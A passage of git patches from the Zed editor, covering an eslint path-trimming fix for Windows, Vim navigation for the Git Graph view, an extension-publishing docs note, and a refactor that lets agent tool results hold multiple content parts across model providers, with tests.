diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54093 (at least the os error 123 in the comments of that bug)/#54901 (although the diagnosis in that bug is totally wrong) Used process monitor to work out what that issue was: image There's actually a '\n' after node_modules there so it's an invalid directory. Add trim() to fix. After adding that change locally, eslint loaded fine Release Notes: - Fixed bug where eslint didn't start on Windows --- crates/project/src/lsp_store.rs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/crates/project/src/lsp_store.rs b/crates/project/src/lsp_store.rs index 483f1252c4d10b..13d1cd90f47762 100644 --- a/crates/project/src/lsp_store.rs +++ b/crates/project/src/lsp_store.rs @@ -14502,7 +14502,7 @@ impl LspAdapterDelegate for LocalLspAdapterDelegate { .output() .await?; let global_node_modules = - PathBuf::from(String::from_utf8_lossy(&output.stdout).to_string()); + PathBuf::from(String::from_utf8_lossy(&output.stdout).trim().to_string()); if let Some(version) = read_package_installed_version(global_node_modules.clone(), package_name).await? From 4c92205a0b30c322a41e9e2633be956aab2b2902 Mon Sep 17 00:00:00 2001 From: Nihal Kumar Date: Mon, 27 Apr 2026 16:44:33 +0530 Subject: [PATCH 055/231] git_graph: Wire up Vim mode navigation (#53609) Added Vim mode navigation (`j`, `k`, `gg`, `G`) to the Git Graph view. [gitgraph-vim.webm](https://github.com/user-attachments/assets/b2dd31a5-deb0-48ab-a48d-8721ee500dad) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #53525 Release Notes: - Added vim mode navigation to git graph --------- Co-authored-by: Anthony Eid --- assets/keymaps/vim.json | 9 ++ crates/git_graph/src/git_graph.rs | 140 ++++++++++++++++++++++++++++++ 2 files changed, 149 insertions(+) diff --git a/assets/keymaps/vim.json b/assets/keymaps/vim.json index 4d93761eaeab0e..188ea2e483a65d 100644 --- a/assets/keymaps/vim.json +++ b/assets/keymaps/vim.json @@ -1033,6 +1033,15 @@ "enter": "menu::Cancel", }, }, + { + "context": "GitGraph", + "bindings": { + "j": "vim::MenuSelectNext", + "k": "vim::MenuSelectPrevious", + "shift-g": "menu::SelectLast", + "g g": "menu::SelectFirst" + } + }, { "context": "GitPanel && ChangesList && !GitBranchSelector", "use_key_equivalents": true, diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index 6d3d99ee2a98aa..a69da25daa9018 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -5072,4 +5072,144 @@ mod tests { ); }); } + + #[gpui::test] + async fn test_git_graph_navigation(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + Path::new("/project"), + serde_json::json!({ + ".git": {}, + "file.txt": "content", + }), + ) + .await; + + let mut rng = StdRng::seed_from_u64(42); + let commits = generate_random_commit_dag(&mut rng, 10, false); + fs.set_graph_commits(Path::new("/project/.git"), commits); + + let project = Project::test(fs.clone(), [Path::new("/project")], cx).await; + cx.run_until_parked(); + + let repository = project.read_with(cx, |project, cx| { + project + .active_repository(cx) + .expect("should have a repository") + }); + + let (multi_workspace, cx) = cx.add_window_view(|window, cx| { + workspace::MultiWorkspace::test_new(project.clone(), window, cx) + }); + + let workspace_weak = + multi_workspace.read_with(&*cx, |multi, _| multi.workspace().downgrade()); + + let git_graph = cx.new_window_entity(|window, cx| { + GitGraph::new( + repository.read(cx).id, + project.read(cx).git_store().clone(), + workspace_weak, + None, + window, + cx, + ) + }); + cx.run_until_parked(); + + git_graph.update_in(cx, |graph, window, cx| { + graph.focus_handle(cx).focus(window, cx); + }); + cx.run_until_parked(); + + cx.draw( + point(px(0.), px(0.)), + gpui::size(px(1200.), px(800.)), + |_, _| git_graph.clone().into_any_element(), + ); + cx.run_until_parked(); + + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.graph_data.commits.len(), 10); + }); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, None); + }); + + git_graph.update_in(cx, |graph, window, cx| { + graph.select_first(&menu::SelectFirst, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(0)); + }); + + git_graph.update_in(cx, |graph, window, cx| { + graph.select_next(&menu::SelectNext, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(1)); + }); + + git_graph.update_in(cx, |graph, window, cx| { + graph.select_prev(&menu::SelectPrevious, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(0)); + }); + + git_graph.update_in(cx, |graph, window, cx| { + graph.select_last(&menu::SelectLast, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(9)); + }); + + git_graph.update_in(cx, |graph, window, cx| { + graph.select_next(&menu::SelectNext, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(9)); + }); + + git_graph.update_in(cx, |graph, window, cx| { + graph.select_prev(&menu::SelectPrevious, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(8)); + }); + + git_graph.update(cx, |graph, cx| { + graph.selected_entry_idx = None; + cx.notify(); + }); + cx.run_until_parked(); + git_graph.update_in(cx, |graph, window, cx| { + graph.select_prev(&menu::SelectPrevious, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(0)); + }); + + git_graph.update(cx, |graph, cx| { + graph.selected_entry_idx = None; + cx.notify(); + }); + cx.run_until_parked(); + git_graph.update_in(cx, |graph, window, cx| { + graph.select_next(&menu::SelectNext, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(0)); + }); + } } From 149d40b48d5f9f49c43bb7a856c13fec4f1df523 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Mon, 27 Apr 2026 13:38:33 +0200 Subject: [PATCH 056/231] docs: Prompt extension authors to test their extension before publishing (#54998) Release Notes: - N/A --- docs/src/extensions/developing-extensions.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/docs/src/extensions/developing-extensions.md b/docs/src/extensions/developing-extensions.md index 01c16dc62be8b9..7a52a4dc6606a7 100644 --- a/docs/src/extensions/developing-extensions.md +++ b/docs/src/extensions/developing-extensions.md @@ -162,6 +162,8 @@ Note that non-compliance will be raised during the publishing process by reviewe ## Publishing your extension +> Prior to publishing your extension, you should have installed as well as tested it locally thoroughly. Note that untested extension submissions where the extension is not functioning at all will be closed eagerly without further feedback. + To publish an extension, open a PR to [the `zed-industries/extensions` repo](https://github.com/zed-industries/extensions). In your PR, do the following: From cc0f953393957729e686f95788de2b0082577c9a Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 27 Apr 2026 14:36:11 +0200 Subject: [PATCH 057/231] agent: Allow tools to output multiple content parts (#54518) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- crates/agent/src/db.rs | 2 +- crates/agent/src/edit_agent/evals.rs | 2 +- .../agent/src/tests/edit_file_thread_test.rs | 5 +- crates/agent/src/tests/mod.rs | 178 ++++++++++++++--- crates/agent/src/thread.rs | 80 +++++--- .../src/tools/context_server_registry.rs | 12 +- .../src/tools/evals/streaming_edit_file.rs | 2 +- crates/anthropic/src/completion.rs | 45 +++-- crates/google_ai/src/completion.rs | 53 ++--- crates/language_model/src/fake_provider.rs | 8 +- crates/language_model_core/src/request.rs | 185 ++++++++++++++++-- .../language_models/src/provider/bedrock.rs | 12 +- .../src/provider/copilot_chat.rs | 97 +++++---- .../language_models/src/provider/deepseek.rs | 25 ++- .../language_models/src/provider/lmstudio.rs | 34 ++-- .../language_models/src/provider/mistral.rs | 17 +- crates/language_models/src/provider/ollama.rs | 2 +- .../src/provider/open_router.rs | 28 +-- crates/open_ai/src/completion.rs | 61 +++--- 19 files changed, 620 insertions(+), 228 deletions(-) diff --git a/crates/agent/src/db.rs b/crates/agent/src/db.rs index 0ed03ed51703b0..a34290742ad59a 100644 --- a/crates/agent/src/db.rs +++ b/crates/agent/src/db.rs @@ -261,7 +261,7 @@ impl DbThread { tool_use_id: tool_result.tool_use_id, tool_name: name.into(), is_error: tool_result.is_error, - content: tool_result.content, + content: vec![tool_result.content], output: tool_result.output, }, ); diff --git a/crates/agent/src/edit_agent/evals.rs b/crates/agent/src/edit_agent/evals.rs index c1c2886f84e0aa..7e4f314afd0db2 100644 --- a/crates/agent/src/edit_agent/evals.rs +++ b/crates/agent/src/edit_agent/evals.rs @@ -1156,7 +1156,7 @@ fn tool_result( tool_use_id: LanguageModelToolUseId::from(id.into()), tool_name: name.into(), is_error: false, - content: LanguageModelToolResultContent::Text(result.into()), + content: vec![LanguageModelToolResultContent::Text(result.into())], output: None, }) } diff --git a/crates/agent/src/tests/edit_file_thread_test.rs b/crates/agent/src/tests/edit_file_thread_test.rs index b5ce6441e790e0..3efd7753740bc8 100644 --- a/crates/agent/src/tests/edit_file_thread_test.rs +++ b/crates/agent/src/tests/edit_file_thread_test.rs @@ -387,10 +387,7 @@ async fn test_streaming_edit_json_parse_error_does_not_cause_unsaved_changes( "Tool result should succeed, got: {:?}", tool_result ); - let content_text = match &tool_result.content { - language_model::LanguageModelToolResultContent::Text(t) => t.to_string(), - other => panic!("Expected text content, got: {:?}", other), - }; + let content_text = tool_result.text_contents(); assert!( !content_text.contains("file has been modified since you last read it"), "Did not expect a stale last-read error, got: {content_text}" diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index f8d74e0df95e53..996e753952b6cb 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -494,7 +494,9 @@ async fn test_system_prompt(cx: &mut TestAppContext) { assert_eq!(pending_completion.messages[0].role, Role::System); let system_message = &pending_completion.messages[0]; - let system_prompt = system_message.content[0].to_str().unwrap(); + let MessageContent::Text(system_prompt) = &system_message.content[0] else { + panic!("Expected text content"); + }; assert!( system_prompt.contains("test-shell"), "unexpected system message: {:?}", @@ -530,7 +532,9 @@ async fn test_system_prompt_without_tools(cx: &mut TestAppContext) { assert_eq!(pending_completion.messages[0].role, Role::System); let system_message = &pending_completion.messages[0]; - let system_prompt = system_message.content[0].to_str().unwrap(); + let MessageContent::Text(system_prompt) = &system_message.content[0] else { + panic!("Expected text content"); + }; assert!( !system_prompt.contains("## Tool Use"), "unexpected system message: {:?}", @@ -637,7 +641,7 @@ async fn test_prompt_caching(cx: &mut TestAppContext) { tool_use_id: "tool_1".into(), tool_name: EchoTool::NAME.into(), is_error: false, - content: "test".into(), + content: vec!["test".into()], output: Some("test".into()), }; assert_eq!( @@ -866,14 +870,14 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { tool_use_id: tool_call_auth_1.tool_call.tool_call_id.0.to_string().into(), tool_name: ToolRequiringPermission::NAME.into(), is_error: false, - content: "Allowed".into(), + content: vec!["Allowed".into()], output: Some("Allowed".into()) }), language_model::MessageContent::ToolResult(LanguageModelToolResult { tool_use_id: tool_call_auth_2.tool_call.tool_call_id.0.to_string().into(), tool_name: ToolRequiringPermission::NAME.into(), is_error: true, - content: "Permission to run tool denied by user".into(), + content: vec!["Permission to run tool denied by user".into()], output: Some("Permission to run tool denied by user".into()) }) ] @@ -912,7 +916,7 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { tool_use_id: tool_call_auth_3.tool_call.tool_call_id.0.to_string().into(), tool_name: ToolRequiringPermission::NAME.into(), is_error: false, - content: "Allowed".into(), + content: vec!["Allowed".into()], output: Some("Allowed".into()) } )] @@ -940,7 +944,7 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { tool_use_id: "tool_id_4".into(), tool_name: ToolRequiringPermission::NAME.into(), is_error: false, - content: "Allowed".into(), + content: vec!["Allowed".into()], output: Some("Allowed".into()) } )] @@ -1562,14 +1566,14 @@ async fn test_mcp_tools(cx: &mut TestAppContext) { tool_use_id: "tool_3".into(), tool_name: "echo".into(), is_error: false, - content: "native".into(), + content: vec!["native".into()], output: Some("native".into()), },), MessageContent::ToolResult(LanguageModelToolResult { tool_use_id: "tool_2".into(), tool_name: "test_server_echo".into(), is_error: false, - content: "mcp".into(), + content: vec!["mcp".into()], output: Some("mcp".into()), },), ] @@ -1578,6 +1582,126 @@ async fn test_mcp_tools(cx: &mut TestAppContext) { events.collect::>().await; } +#[gpui::test] +async fn test_mcp_tool_multi_content_response(cx: &mut TestAppContext) { + let ThreadTest { + model, + thread, + context_server_store, + fs, + .. + } = setup(cx, TestModel::Fake).await; + let fake_model = model.as_fake(); + fake_model.set_supports_images(true); + + fs.insert_file( + paths::settings_file(), + json!({ + "agent": { + "tool_permissions": { "default": "allow" }, + "profiles": { + "test": { + "name": "Test Profile", + "enable_all_context_servers": true, + "tools": {} + }, + } + } + }) + .to_string() + .into_bytes(), + ) + .await; + cx.run_until_parked(); + thread.update(cx, |thread, cx| { + thread.set_profile(AgentProfileId("test".into()), cx) + }); + + let mut mcp_tool_calls = setup_context_server( + "screenshot_server", + vec![context_server::types::Tool { + name: "screenshot".into(), + description: None, + input_schema: json!({"type": "object", "properties": {}}), + output_schema: None, + annotations: None, + }], + &context_server_store, + cx, + ); + + let events = thread.update(cx, |thread, cx| { + thread + .send(UserMessageId::new(), ["Take a screenshot"], cx) + .unwrap() + }); + cx.run_until_parked(); + + let completion = fake_model.pending_completions().pop().unwrap(); + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: "tool_1".into(), + name: "screenshot".into(), + raw_input: json!({}).to_string(), + input: json!({}), + is_input_complete: true, + thought_signature: None, + }, + )); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + let _ = completion; + + let (tool_call_params, tool_call_response) = mcp_tool_calls.next().await.unwrap(); + assert_eq!(tool_call_params.name, "screenshot"); + tool_call_response + .send(context_server::types::CallToolResponse { + content: vec![ + context_server::types::ToolResponseContent::Text { + text: "Some text".into(), + }, + context_server::types::ToolResponseContent::Image { + data: "aGVsbG8=".into(), + mime_type: "image/png".into(), + }, + context_server::types::ToolResponseContent::Text { + text: "Some more text".into(), + }, + ], + is_error: None, + meta: None, + structured_content: None, + }) + .unwrap(); + cx.run_until_parked(); + + // Verify the tool result round-trips back to the model as a multi-part Vec. + let completion = fake_model.pending_completions().pop().unwrap(); + let tool_result = completion + .messages + .last() + .unwrap() + .content + .iter() + .find_map(|c| match c { + MessageContent::ToolResult(r) => Some(r.clone()), + _ => None, + }) + .expect("expected a tool result"); + assert_eq!(tool_result.tool_use_id, "tool_1".into()); + assert_eq!(tool_result.content.len(), 2); + assert_eq!( + tool_result.content[0], + language_model::LanguageModelToolResultContent::Text(Arc::from("Some text")) + ); + assert_eq!( + tool_result.content[1], + language_model::LanguageModelToolResultContent::Text(Arc::from("Some more text")) + ); + fake_model.end_last_completion_stream(); + events.collect::>().await; +} + #[gpui::test] async fn test_mcp_tool_result_displayed_when_server_disconnected(cx: &mut TestAppContext) { let ThreadTest { @@ -2106,10 +2230,7 @@ async fn test_terminal_tool_cancellation_captures_output(cx: &mut TestAppContext .get(&tool_use.id) .expect("expected tool result"); - let result_text = match &tool_result.content { - language_model::LanguageModelToolResultContent::Text(text) => text.to_string(), - _ => panic!("expected text content in tool result"), - }; + let result_text = tool_result.text_contents(); // "partial output" comes from FakeTerminalHandle's output field assert!( @@ -2571,10 +2692,7 @@ async fn test_terminal_tool_stopped_via_terminal_card_button(cx: &mut TestAppCon .get(&tool_use.id) .expect("expected tool result"); - let result_text = match &tool_result.content { - language_model::LanguageModelToolResultContent::Text(text) => text.to_string(), - _ => panic!("expected text content in tool result"), - }; + let result_text = tool_result.text_contents(); assert!( result_text.contains("The user stopped this command"), @@ -2666,10 +2784,7 @@ async fn test_terminal_tool_timeout_expires(cx: &mut TestAppContext) { .get(&tool_use.id) .expect("expected tool result"); - let result_text = match &tool_result.content { - language_model::LanguageModelToolResultContent::Text(text) => text.to_string(), - _ => panic!("expected text content in tool result"), - }; + let result_text = tool_result.text_contents(); assert!( result_text.contains("timed out"), @@ -3290,7 +3405,7 @@ async fn test_building_request_with_pending_tools(cx: &mut TestAppContext) { tool_use_id: echo_tool_use.id.clone(), tool_name: echo_tool_use.name, is_error: false, - content: "test".into(), + content: vec!["test".into()], output: Some("test".into()) })], cache: false, @@ -3776,7 +3891,7 @@ async fn test_send_retry_finishes_tool_calls_on_error(cx: &mut TestAppContext) { tool_use_id: tool_use_1.id.clone(), tool_name: tool_use_1.name.clone(), is_error: false, - content: "test".into(), + content: vec!["test".into()], output: Some("test".into()) } )], @@ -3936,8 +4051,10 @@ async fn test_streaming_tool_completes_when_llm_stream_ends_without_final_input( tool_use_id: tool_use.id.clone(), tool_name: tool_use.name, is_error: true, - content: "Failed to receive tool input: tool input was not fully received" - .into(), + content: vec![ + "Failed to receive tool input: tool input was not fully received" + .into(), + ], output: Some( "Failed to receive tool input: tool input was not fully received" .into() @@ -4044,10 +4161,7 @@ async fn test_streaming_tool_json_parse_error_is_forwarded_to_running_tool( let result = tool_results[0]; assert!(result.is_error); - let content_text = match &result.content { - language_model::LanguageModelToolResultContent::Text(text) => text.to_string(), - other => panic!("Expected text content, got {:?}", other), - }; + let content_text = result.text_contents(); assert!( content_text.contains("Saw partial text 'partial' before invalid JSON"), "Expected tool-enriched partial context, got: {content_text}" @@ -7069,7 +7183,7 @@ async fn test_streaming_tool_error_breaks_stream_loop_immediately(cx: &mut TestA tool_use_id: tool_use.id.clone(), tool_name: tool_use.name, is_error: true, - content: "failed".into(), + content: vec!["failed".into()], output: Some("failed".into()), } )], @@ -7180,14 +7294,14 @@ async fn test_streaming_tool_error_waits_for_prior_tools_to_complete(cx: &mut Te tool_use_id: second_tool_use.id.clone(), tool_name: second_tool_use.name, is_error: true, - content: "failed".into(), + content: vec!["failed".into()], output: Some("failed".into()), }), language_model::MessageContent::ToolResult(LanguageModelToolResult { tool_use_id: first_tool_use.id.clone(), tool_name: first_tool_use.name, is_error: false, - content: "hello world".into(), + content: vec!["hello world".into()], output: Some("hello world".into()), }), ], diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index 89b3b0eb25190b..2a8a6a5b3cb290 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -518,12 +518,14 @@ impl AgentMessage { markdown.push_str("**ERROR:**\n"); } - match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - writeln!(markdown, "{text}\n").ok(); - } - LanguageModelToolResultContent::Image(_) => { - writeln!(markdown, "\n").ok(); + for part in &tool_result.content { + match part { + LanguageModelToolResultContent::Text(text) => { + writeln!(markdown, "{text}\n").ok(); + } + LanguageModelToolResultContent::Image(_) => { + writeln!(markdown, "\n").ok(); + } } } @@ -588,8 +590,8 @@ impl AgentMessage { let mut tool_result = tool_result.clone(); // Surprisingly, the API fails if we return an empty string here. // It thinks we are sending a tool use without a tool result. - if tool_result.content.is_empty() { - tool_result.content = "".into(); + if tool_result.is_content_empty() { + tool_result.content = vec!["".into()]; } user_message .content @@ -2332,7 +2334,7 @@ impl Thread { let Some(tool) = tool else { let content = format!("No tool named {} exists", tool_use.name); return Some(Task::ready(LanguageModelToolResult { - content: LanguageModelToolResultContent::Text(Arc::from(content)), + content: vec![LanguageModelToolResultContent::Text(Arc::from(content))], tool_use_id: tool_use.id, tool_name: tool_use.name, is_error: true, @@ -2418,13 +2420,39 @@ impl Thread { cx.foreground_executor().spawn(async move { let (is_error, output) = match tool_result.await { Ok(mut output) => { - if let LanguageModelToolResultContent::Image(_) = &output.llm_output - && !supports_images - { - output = AgentToolOutput::from_error( - "Attempted to read an image, but this model doesn't support it.", - ); - (true, output) + let contains_image = output + .llm_output + .iter() + .any(|part| matches!(part, LanguageModelToolResultContent::Image(_))); + if contains_image && !supports_images { + // Replace each image part with an inline placeholder so + // any accompanying text is still presented to the model. + // If there's nothing else in the output, surface an error + // to match the pre-multi-part behavior for image-only + // tool results. + let placeholder = LanguageModelToolResultContent::Text(Arc::from( + "[Tool responded with an image, but this model doesn't support images]", + )); + let has_non_image = output + .llm_output + .iter() + .any(|part| !matches!(part, LanguageModelToolResultContent::Image(_))); + if has_non_image { + output.llm_output = output + .llm_output + .into_iter() + .map(|part| match part { + LanguageModelToolResultContent::Image(_) => placeholder.clone(), + other => other, + }) + .collect(); + (false, output) + } else { + let output = AgentToolOutput::from_error( + "Attempted to read an image, but this model doesn't support it.", + ); + (true, output) + } } else { (false, output) } @@ -2472,7 +2500,7 @@ impl Thread { let Some(tool) = tool else { let content = format!("No tool named {} exists", tool_use.name); return Some(Task::ready(LanguageModelToolResult { - content: LanguageModelToolResultContent::Text(Arc::from(content)), + content: vec![LanguageModelToolResultContent::Text(Arc::from(content))], tool_use_id: tool_use.id, tool_name: tool_use.name, is_error: true, @@ -2743,7 +2771,9 @@ impl Thread { tool_use_id: tool_use.id.clone(), tool_name: tool_use.name.clone(), is_error: true, - content: LanguageModelToolResultContent::Text(TOOL_CANCELED_MESSAGE.into()), + content: vec![LanguageModelToolResultContent::Text( + TOOL_CANCELED_MESSAGE.into(), + )], output: None, }, ); @@ -3392,14 +3422,16 @@ where pub struct Erased(T); pub struct AgentToolOutput { - pub llm_output: LanguageModelToolResultContent, + pub llm_output: Vec, pub raw_output: serde_json::Value, } impl AgentToolOutput { pub fn from_error(message: impl Into) -> Self { let message = message.into(); - let llm_output = LanguageModelToolResultContent::Text(Arc::from(message.as_str())); + let llm_output = vec![LanguageModelToolResultContent::Text(Arc::from( + message.as_str(), + ))]; Self { raw_output: serde_json::Value::String(message), llm_output, @@ -3484,7 +3516,7 @@ where AgentToolOutput::from_error(format!("Failed to serialize tool output: {e}")) })?; Ok(AgentToolOutput { - llm_output: output.into(), + llm_output: vec![output.into()], raw_output, }) } @@ -3494,7 +3526,7 @@ where serde_json::Value::Null }); Err(AgentToolOutput { - llm_output: error_output.into(), + llm_output: vec![error_output.into()], raw_output, }) } @@ -4518,8 +4550,8 @@ mod tests { assert_eq!(result.tool_use_id, tool_use_id); assert_eq!(result.tool_name, tool_name); assert!(matches!( - result.content, - LanguageModelToolResultContent::Text(_) + result.content.as_slice(), + [LanguageModelToolResultContent::Text(_)] )); thread.update(cx, |thread, _cx| { diff --git a/crates/agent/src/tools/context_server_registry.rs b/crates/agent/src/tools/context_server_registry.rs index 65b5df8abfe1c0..c5476d6343d188 100644 --- a/crates/agent/src/tools/context_server_registry.rs +++ b/crates/agent/src/tools/context_server_registry.rs @@ -5,6 +5,7 @@ use collections::{BTreeMap, HashMap}; use context_server::{ContextServerId, client::NotificationSubscription}; use futures::FutureExt as _; use gpui::{App, AppContext, AsyncApp, Context, Entity, EventEmitter, SharedString, Task}; +use language_model::LanguageModelToolResultContent; use project::context_server_store::{ContextServerStatus, ContextServerStore}; use std::sync::Arc; use util::ResultExt; @@ -389,11 +390,13 @@ impl AnyAgentTool for ContextServerTool { return Err(AgentToolOutput::from_error(error_message)); } - let mut result = String::new(); + let mut llm_output = Vec::new(); + let mut concatenated_text = String::new(); for content in response.content { match content { context_server::types::ToolResponseContent::Text { text } => { - result.push_str(&text); + concatenated_text.push_str(&text); + llm_output.push(LanguageModelToolResultContent::Text(text.into())); } context_server::types::ToolResponseContent::Image { .. } => { log::warn!("Ignoring image content from tool response"); @@ -406,9 +409,10 @@ impl AnyAgentTool for ContextServerTool { } } } + let raw_output = serde_json::Value::String(concatenated_text); Ok(AgentToolOutput { - raw_output: result.clone().into(), - llm_output: result.into(), + raw_output, + llm_output, }) }) } diff --git a/crates/agent/src/tools/evals/streaming_edit_file.rs b/crates/agent/src/tools/evals/streaming_edit_file.rs index 3156fd253978bc..c82f652daca933 100644 --- a/crates/agent/src/tools/evals/streaming_edit_file.rs +++ b/crates/agent/src/tools/evals/streaming_edit_file.rs @@ -666,7 +666,7 @@ fn tool_result( tool_use_id: LanguageModelToolUseId::from(id.into()), tool_name: name.into(), is_error: false, - content: LanguageModelToolResultContent::Text(result.into()), + content: vec![LanguageModelToolResultContent::Text(result.into())], output: None, }) } diff --git a/crates/anthropic/src/completion.rs b/crates/anthropic/src/completion.rs index 7bb4821cc78755..48eed580d6839d 100644 --- a/crates/anthropic/src/completion.rs +++ b/crates/anthropic/src/completion.rs @@ -70,25 +70,38 @@ fn to_anthropic_content(content: MessageContent) -> Option { input: tool_use.input, cache_control: None, }), - MessageContent::ToolResult(tool_result) => Some(RequestContent::ToolResult { - tool_use_id: tool_result.tool_use_id.to_string(), - is_error: tool_result.is_error, - content: match tool_result.content { - LanguageModelToolResultContent::Text(text) => { + MessageContent::ToolResult(tool_result) => { + let content = match tool_result.content.as_slice() { + [LanguageModelToolResultContent::Text(text)] => { ToolResultContent::Plain(text.to_string()) } - LanguageModelToolResultContent::Image(image) => { - ToolResultContent::Multipart(vec![ToolResultPart::Image { - source: ImageSource { - source_type: "base64".to_string(), - media_type: "image/png".to_string(), - data: image.source.to_string(), - }, - }]) + _ => { + let parts = tool_result + .content + .into_iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => ToolResultPart::Text { + text: text.to_string(), + }, + LanguageModelToolResultContent::Image(image) => ToolResultPart::Image { + source: ImageSource { + source_type: "base64".to_string(), + media_type: "image/png".to_string(), + data: image.source.to_string(), + }, + }, + }) + .collect(); + ToolResultContent::Multipart(parts) } - }, - cache_control: None, - }), + }; + Some(RequestContent::ToolResult { + tool_use_id: tool_result.tool_use_id.to_string(), + is_error: tool_result.is_error, + content, + cache_control: None, + }) + } } } diff --git a/crates/google_ai/src/completion.rs b/crates/google_ai/src/completion.rs index efbd1dc9ff731f..b546682c5525c1 100644 --- a/crates/google_ai/src/completion.rs +++ b/crates/google_ai/src/completion.rs @@ -70,38 +70,39 @@ pub fn into_google( })] } MessageContent::ToolResult(tool_result) => { - match tool_result.content { - language_model_core::LanguageModelToolResultContent::Text(text) => { - vec![Part::FunctionResponsePart(crate::FunctionResponsePart { - function_response: crate::FunctionResponse { - name: tool_result.tool_name.to_string(), - // The API expects a valid JSON object - response: serde_json::json!({ - "output": text - }), - }, - })] - } - language_model_core::LanguageModelToolResultContent::Image(image) => { - vec![ - Part::FunctionResponsePart(crate::FunctionResponsePart { - function_response: crate::FunctionResponse { - name: tool_result.tool_name.to_string(), - // The API expects a valid JSON object - response: serde_json::json!({ - "output": "Tool responded with an image" - }), - }, - }), - Part::InlineDataPart(InlineDataPart { + let mut text_output = String::new(); + let mut images: Vec = Vec::new(); + for part in tool_result.content { + match part { + language_model_core::LanguageModelToolResultContent::Text(text) => { + text_output.push_str(&text); + } + language_model_core::LanguageModelToolResultContent::Image(image) => { + images.push(InlineDataPart { inline_data: GenerativeContentBlob { mime_type: "image/png".to_string(), data: image.source.to_string(), }, - }), - ] + }); + } } } + let output = if text_output.is_empty() && !images.is_empty() { + "Tool responded with an image".to_string() + } else { + text_output + }; + let mut parts = vec![Part::FunctionResponsePart(crate::FunctionResponsePart { + function_response: crate::FunctionResponse { + name: tool_result.tool_name.to_string(), + // The API expects a valid JSON object + response: serde_json::json!({ + "output": output + }), + }, + })]; + parts.extend(images.into_iter().map(Part::InlineDataPart)); + parts } }) .collect() diff --git a/crates/language_model/src/fake_provider.rs b/crates/language_model/src/fake_provider.rs index 4466a3f2762b03..dfef78b5fcec7b 100644 --- a/crates/language_model/src/fake_provider.rs +++ b/crates/language_model/src/fake_provider.rs @@ -125,6 +125,7 @@ pub struct FakeLanguageModel { forbid_requests: AtomicBool, supports_thinking: AtomicBool, supports_streaming_tools: AtomicBool, + supports_images: AtomicBool, } impl Default for FakeLanguageModel { @@ -138,6 +139,7 @@ impl Default for FakeLanguageModel { forbid_requests: AtomicBool::new(false), supports_thinking: AtomicBool::new(false), supports_streaming_tools: AtomicBool::new(false), + supports_images: AtomicBool::new(false), } } } @@ -174,6 +176,10 @@ impl FakeLanguageModel { self.supports_streaming_tools.store(supports, SeqCst); } + pub fn set_supports_images(&self, supports: bool) { + self.supports_images.store(supports, SeqCst); + } + pub fn pending_completions(&self) -> Vec { self.current_completion_txs .lock() @@ -280,7 +286,7 @@ impl LanguageModel for FakeLanguageModel { } fn supports_images(&self) -> bool { - false + self.supports_images.load(SeqCst) } fn supports_thinking(&self) -> bool { diff --git a/crates/language_model_core/src/request.rs b/crates/language_model_core/src/request.rs index a35f4883389f0a..f352ce16d227d6 100644 --- a/crates/language_model_core/src/request.rs +++ b/crates/language_model_core/src/request.rs @@ -102,12 +102,74 @@ pub struct LanguageModelToolResult { pub tool_use_id: LanguageModelToolUseId, pub tool_name: Arc, pub is_error: bool, - /// The tool output formatted for presenting to the model - pub content: LanguageModelToolResultContent, + #[serde(with = "tool_result_content_vec")] + pub content: Vec, /// The raw tool output, if available, often for debugging or extra state for replay pub output: Option, } +impl 